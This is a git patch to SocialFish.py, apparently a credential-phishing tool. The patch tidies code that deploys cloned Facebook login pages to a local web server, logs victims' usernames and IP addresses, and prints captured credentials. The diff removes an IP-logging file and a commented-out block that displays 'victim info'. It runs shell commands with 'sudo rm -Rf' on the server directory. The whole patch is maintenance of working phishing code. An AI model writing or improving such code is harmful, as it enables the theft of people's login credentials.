From d941d902d4d4618ad85743ce20fbc28e03fb6f96 Mon Sep 17 00:00:00 2001 From: Usama Abdul Sattar Date: Fri, 8 Jun 2018 17:22:08 +0500 Subject: [PATCH] code clean-up --- SocialFish.py | 14 ++------------ 1 file changed, 2 insertions(+), 12 deletions(-) diff --git a/SocialFish.py b/SocialFish.py index 8bcec0b..eaafc44 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -75,7 +75,7 @@ def loadModule(module): [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module def runPhishing(social, option2): - system('sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/iplog.txt && touch Server/www/ip.txt && cp WebPages/base.php Server/www/ && cp WebPages/ip.php Server/www/') + system('sudo rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/') if option2 == '1' and social == 'Facebook': copy_tree("WebPages/fb_standard/", "Server/www/") if option2 == '2' and social == 'Facebook': @@ -164,17 +164,7 @@ def waitCreds(): creds.close() - ''' - with open('Server/www/iplog.txt') as creds: - lines = creds.read().rstrip() - if len(lines) != 0: - print '======================================================================'.format(RED, END) - print ' {0}[ VICTIM INFO FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines - system('rm -rf Server/www/iplog.txt && touch Server/www/iplog.txt') - print '======================================================================'.format(RED, END) - - creds.close() - ''' + def runPEnv(): system('clear')